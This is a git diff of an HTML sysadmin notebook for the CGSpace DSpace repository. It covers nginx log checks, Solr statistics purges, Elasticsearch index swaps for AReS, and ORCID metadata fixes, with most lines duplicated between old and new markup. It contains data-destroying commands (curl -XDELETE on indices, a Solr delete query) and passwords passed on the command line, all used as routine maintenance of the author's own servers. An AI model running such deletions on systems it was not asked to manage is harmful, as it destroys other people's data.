<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># grep -E <span style="color:#e6db74">&#39;26/Jan/2021:(08|09|10|11|12)&#39;</span> /var/log/nginx/rest.log | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep -E <span style="color:#e6db74">&#39;26/Jan/2021:(08|09|10|11|12)&#39;</span> /var/log/nginx/rest.log | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
</span></span></code></pre></div><ul>
<li>The culprit seems to be the ILRI publications importer, so that&rsquo;s OK</li>
<li>But I also see an IP in Jordan hitting the REST API 1,100 times today:</li>
</ul>
<pre tabindex="0"><code>80.10.12.54 - - [26/Jan/2021:09:43:42 +0100] &quot;GET /rest/rest/bitstreams/98309f17-a831-48ed-8f0a-2d3244cc5a1c/retrieve HTTP/2.0&quot; 302 138 &quot;http://wp.local/&quot; &quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36&quot;
<pre tabindex="0"><code>80.10.12.54 - - [26/Jan/2021:09:43:42 +0100] &#34;GET /rest/rest/bitstreams/98309f17-a831-48ed-8f0a-2d3244cc5a1c/retrieve HTTP/2.0&#34; 302 138 &#34;http://wp.local/&#34; &#34;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36&#34;
</code></pre><ul>
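<li>A quick way to tally that IP&rsquo;s hits, assuming the same nginx log as above:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &#39;^80\.10\.12\.54 &#39; /var/log/nginx/rest.log
</code></pre><ul>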
<li>Seems to be someone from CodeObia working on WordPress
<ul>
@ -615,8 +615,8 @@ java.lang.IllegalArgumentException: Invalid character found in the request targe
</li>
<li>I purged all ~3,000 statistics hits that have the &ldquo;<a href="http://wp.local/">http://wp.local/</a>&rdquo; referrer:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;referrer:http\:\/\/wp\.local\/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;referrer:http\:\/\/wp\.local\/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><ul>
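<li>A hedged sanity check before purges like that is to run the same query as a select with <code>rows=0</code> and inspect <code>numFound</code>:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=referrer:http\:\/\/wp\.local\/&amp;rows=0&#39;
</code></pre><ul>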
<li>Tag version 0.4.3 of the csv-metadata-quality tool on GitHub: <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.3">https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.3</a>
<ul>
<li>I just realized that I never submitted this to CGSpace as a Big Data Platform output</li>
@ -661,9 +661,9 @@ java.lang.IllegalArgumentException: Invalid character found in the request targe
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span></code></pre></div><ul>
<li>Sent out emails about CG Core v2 to Macaroni Bros, Fabio, Hector at CCAFS, Dani and Tariku</li>
<li>A bit more minor work on testing the series/report/journal changes for CG Core v2</li>
</ul>

View File

@ -60,7 +60,7 @@ $ curl -s &#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#3
}
}
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -157,34 +157,34 @@ $ curl -s &#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#3
<li>I had a call with CodeObia to discuss the work on OpenRXV</li>
<li>Check the results of the AReS harvesting from last night:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100875,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>Set the current items index to read-only and make a backup:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-01
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-01
</span></span></code></pre></div><ul>
<li>Delete the current items index and clone the temp one to it:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span></code></pre></div><ul>
<li>Then delete the temp and backup:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
{&#34;acknowledged&#34;:true}%
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-01&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>{&#34;acknowledged&#34;:true}%
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-01&#39;</span>
</span></span></code></pre></div><ul>
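<li>After a swap like this, listing the indices with the cat API confirms that only <code>openrxv-items</code> remains:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:9200/_cat/indices?v&#39;
</code></pre><ul>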
<li>Meeting with Peter and Abenet about CGSpace goals and progress</li>
<li>Test submission to DSpace via REST API to see if Abenet can fix / reject it (submit workflow?)</li>
<li>Get Peter a list of users who have submitted or approved on DSpace everrrrrrr, so he can remove some</li>
@ -196,25 +196,25 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</li>
<li>I tried to export the ILRI community from CGSpace but I got an error:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace metadata-export -i 10568/1 -f /tmp/2021-02-01-ILRI.csv
Loading @mire database changes for module MQM
Changes have been processed
Exporting community &#39;International Livestock Research Institute (ILRI)&#39; (10568/1)
Exception: null
java.lang.NullPointerException
at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
at com.google.common.collect.Iterators.concat(Iterators.java:464)
at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
at org.dspace.app.bulkedit.MetadataExport.&lt;init&gt;(MetadataExport.java:77)
at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace metadata-export -i 10568/1 -f /tmp/2021-02-01-ILRI.csv
</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
</span></span><span style="display:flex;"><span>Changes have been processed
</span></span><span style="display:flex;"><span>Exporting community &#39;International Livestock Research Institute (ILRI)&#39; (10568/1)
</span></span><span style="display:flex;"><span> Exception: null
</span></span><span style="display:flex;"><span>java.lang.NullPointerException
</span></span><span style="display:flex;"><span> at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
</span></span><span style="display:flex;"><span> at com.google.common.collect.Iterators.concat(Iterators.java:464)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.&lt;init&gt;(MetadataExport.java:77)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
</span></span><span style="display:flex;"><span> at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
</span></span><span style="display:flex;"><span> at java.lang.reflect.Method.invoke(Method.java:498)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</span></span></code></pre></div><ul>
<li>I imported the production database to my local development environment and got the same error&hellip; WTF is this?
<ul>
<li>I was able to export another smaller community</li>
@ -234,28 +234,28 @@ java.lang.NullPointerException
<li>Maria Garruccio sent me some new ORCID iDs for Bioversity authors, as well as a correction for Stefan Burkart&rsquo;s iD</li>
<li>I saved the new ones to a text file, combined them with the others, extracted the ORCID iDs themselves, and updated the names using <code>resolve-orcids.py</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-02-02-combined-orcids.txt
$ ./ilri/resolve-orcids.py -i /tmp/2021-02-02-combined-orcids.txt -o /tmp/2021-02-02-combined-orcid-names.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-02-02-combined-orcids.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2021-02-02-combined-orcids.txt -o /tmp/2021-02-02-combined-orcid-names.txt
</span></span></code></pre></div><ul>
<li>I sorted the names and added the XML formatting in vim, then ran it through tidy:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/controlled-vocabularies/cg-creator-id.xml
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/controlled-vocabularies/cg-creator-id.xml
</span></span></code></pre></div><ul>
<li>Then I added all the changed names plus Stefan&rsquo;s incorrect ones to a CSV and processed them with <code>fix-metadata-values.py</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-02-02-fix-orcid-ids.csv
cg.creator.id,correct
Burkart Stefan: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
Burkart Stefan: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
Stefan Burkart: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
Stefan Burkart: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
Adina Chain Guadarrama: 0000-0002-6944-2064,Adina Chain-Guadarrama: 0000-0002-6944-2064
Bedru: 0000-0002-7344-5743,Bedru B. Balana: 0000-0002-7344-5743
Leigh Winowiecki: 0000-0001-5572-1284,Leigh Ann Winowiecki: 0000-0001-5572-1284
Sander J. Zwart: 0000-0002-5091-1801,Sander Zwart: 0000-0002-5091-1801
saul lozano-fuentes: 0000-0003-1517-6853,Saul Lozano: 0000-0003-1517-6853
$ ./ilri/fix-metadata-values.py -i 2021-02-02-fix-orcid-ids.csv -db dspace63 -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.creator.id -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">240</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-02-02-fix-orcid-ids.csv
</span></span><span style="display:flex;"><span>cg.creator.id,correct
</span></span><span style="display:flex;"><span>Burkart Stefan: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
</span></span><span style="display:flex;"><span>Burkart Stefan: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
</span></span><span style="display:flex;"><span>Stefan Burkart: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
</span></span><span style="display:flex;"><span>Stefan Burkart: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
</span></span><span style="display:flex;"><span>Adina Chain Guadarrama: 0000-0002-6944-2064,Adina Chain-Guadarrama: 0000-0002-6944-2064
</span></span><span style="display:flex;"><span>Bedru: 0000-0002-7344-5743,Bedru B. Balana: 0000-0002-7344-5743
</span></span><span style="display:flex;"><span>Leigh Winowiecki: 0000-0001-5572-1284,Leigh Ann Winowiecki: 0000-0001-5572-1284
</span></span><span style="display:flex;"><span>Sander J. Zwart: 0000-0002-5091-1801,Sander Zwart: 0000-0002-5091-1801
</span></span><span style="display:flex;"><span>saul lozano-fuentes: 0000-0003-1517-6853,Saul Lozano: 0000-0003-1517-6853
</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i 2021-02-02-fix-orcid-ids.csv -db dspace63 -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.creator.id -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">240</span>
</span></span></code></pre></div><ul>
<li>I also looked up which of these new authors might have existing items that are missing ORCID iDs</li>
<li>I had to port my <code>add-orcid-identifiers-csv.py</code> to DSpace 6 UUIDs. I think it&rsquo;s working, but I want to do a few more tests because it uses a sequence for the <code>metadata_value_id</code></li>
</ul>
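<ul>
<li>For reference, the kind of row the ported script has to insert on DSpace 6 looks roughly like this (a sketch with a placeholder UUID and name; field 240 is <code>cg.creator.id</code>, and the ID comes from the sequence):</li>
</ul>
<pre tabindex="0"><code>dspace=# INSERT INTO metadatavalue (metadata_value_id, dspace_object_id, metadata_field_id, text_value, place, confidence) VALUES (nextval('metadatavalue_seq'), 'xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx', 240, 'Jane Doe: 0000-0002-1825-0097', 1, -1);
</code></pre>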
@ -263,23 +263,23 @@ $ ./ilri/fix-metadata-values.py -i 2021-02-02-fix-orcid-ids.csv -db dspace63 -u
<ul>
<li>Tag forty-three items from Bioversity&rsquo;s new authors with ORCID iDs using <code>add-orcid-identifiers-csv.py</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat /tmp/2021-02-02-add-orcid-ids.csv
dc.contributor.author,cg.creator.id
&#34;Nchanji, E.&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
&#34;Nchanji, Eileen&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
&#34;Nchanji, Eileen Bogweh&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
&#34;Machida, Lewis&#34;,Lewis Machida: 0000-0002-0012-3997
&#34;Mockshell, Jonathan&#34;,Jonathan Mockshell: 0000-0003-1990-6657
&#34;Aubert, C.&#34;,Celine Aubert: 0000-0001-6284-4821
&#34;Aubert, Céline&#34;,Celine Aubert: 0000-0001-6284-4821
&#34;Devare, M.&#34;,Medha Devare: 0000-0003-0041-4812
&#34;Devare, Medha&#34;,Medha Devare: 0000-0003-0041-4812
&#34;Benites-Alfaro, O.E.&#34;,Omar E. Benites-Alfaro: 0000-0002-6852-9598
&#34;Benites-Alfaro, Omar Eduardo&#34;,Omar E. Benites-Alfaro: 0000-0002-6852-9598
&#34;Johnson, Vincent&#34;,VINCENT JOHNSON: 0000-0001-7874-178X
&#34;Lesueur, Didier&#34;,didier lesueur: 0000-0002-6694-0869
$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-02-02-add-orcid-ids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -d
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/2021-02-02-add-orcid-ids.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.id
</span></span><span style="display:flex;"><span>&#34;Nchanji, E.&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
</span></span><span style="display:flex;"><span>&#34;Nchanji, Eileen&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
</span></span><span style="display:flex;"><span>&#34;Nchanji, Eileen Bogweh&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
</span></span><span style="display:flex;"><span>&#34;Machida, Lewis&#34;,Lewis Machida: 0000-0002-0012-3997
</span></span><span style="display:flex;"><span>&#34;Mockshell, Jonathan&#34;,Jonathan Mockshell: 0000-0003-1990-6657
</span></span><span style="display:flex;"><span>&#34;Aubert, C.&#34;,Celine Aubert: 0000-0001-6284-4821
</span></span><span style="display:flex;"><span>&#34;Aubert, Céline&#34;,Celine Aubert: 0000-0001-6284-4821
</span></span><span style="display:flex;"><span>&#34;Devare, M.&#34;,Medha Devare: 0000-0003-0041-4812
</span></span><span style="display:flex;"><span>&#34;Devare, Medha&#34;,Medha Devare: 0000-0003-0041-4812
</span></span><span style="display:flex;"><span>&#34;Benites-Alfaro, O.E.&#34;,Omar E. Benites-Alfaro: 0000-0002-6852-9598
</span></span><span style="display:flex;"><span>&#34;Benites-Alfaro, Omar Eduardo&#34;,Omar E. Benites-Alfaro: 0000-0002-6852-9598
</span></span><span style="display:flex;"><span>&#34;Johnson, Vincent&#34;,VINCENT JOHNSON: 0000-0001-7874-178X
</span></span><span style="display:flex;"><span>&#34;Lesueur, Didier&#34;,didier lesueur: 0000-0002-6694-0869
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-02-02-add-orcid-ids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -d
</span></span></code></pre></div><ul>
<li>I&rsquo;m working on the CGSpace accession for Karl Rich&rsquo;s <a href="https://github.com/ilri/vietnam-pig-model-2018">Viet Nam Pig Model 2018</a> and I noticed his ORCID iD is missing from CGSpace
<ul>
<li>I added it and tagged 141 items of his with the iD</li>
@ -300,9 +300,9 @@ $ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-02-02-add-orcid-ids.csv -db d
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> dspace index-discovery -b
$ dspace oai import -c
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> dspace index-discovery -b
</span></span><span style="display:flex;"><span>$ dspace oai import -c
</span></span></code></pre></div><ul>
<li>Attend Accenture meeting for repository managers
<ul>
<li>Not clear what the SMO wants to get out of us</li>
@ -333,8 +333,8 @@ $ dspace oai import -c
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/delete-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.relation.ispartofseries -m <span style="color:#ae81ff">43</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/delete-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.relation.ispartofseries -m <span style="color:#ae81ff">43</span>
</span></span></code></pre></div><ul>
<li>The corrected versions have a lot of encoding issues, so I asked Peter to send me the proper strings so that I can search and replace them:
<ul>
<li>CIAT Publicaçao</li>
@ -358,8 +358,8 @@ $ dspace oai import -c
<li>I ended up using <a href="https://github.com/LuminosoInsight/python-ftfy">python-ftfy</a> to fix those very easily (see the spot check below), then replaced them in the CSV</li>
<li>Then I trimmed whitespace at the beginning, end, and around the &ldquo;;&rdquo;, and applied the 1,600 fixes using <code>fix-metadata-values.py</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/fix-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.relation.ispartofseries -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">43</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.relation.ispartofseries -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">43</span>
</span></span></code></pre></div><ul>
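<li>ftfy is easy to spot check from the command line on a generic mojibake string (this one is illustrative, not one of Peter&rsquo;s actual values):</li>
</ul>
<pre tabindex="0"><code>$ python3 -c 'import ftfy; print(ftfy.fix_text("PublicaÃ§Ã£o"))'
Publicação
</code></pre>
<ul>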
<li>Help Peter debug an issue with one of Alan Duncan&rsquo;s new FEAST Data reports on CGSpace
<ul>
<li>For some reason the default policy for the item was &ldquo;COLLECTION_492_DEFAULT_READ&rdquo; group, which had zero members</li>
@ -372,12 +372,12 @@ $ dspace oai import -c
<li>Run system updates on CGSpace (linode18), deploy latest 6_x-prod branch, and reboot the server</li>
<li>After the server came back up I started a full Discovery re-indexing:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 247m30.850s
user 160m36.657s
sys 2m26.050s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
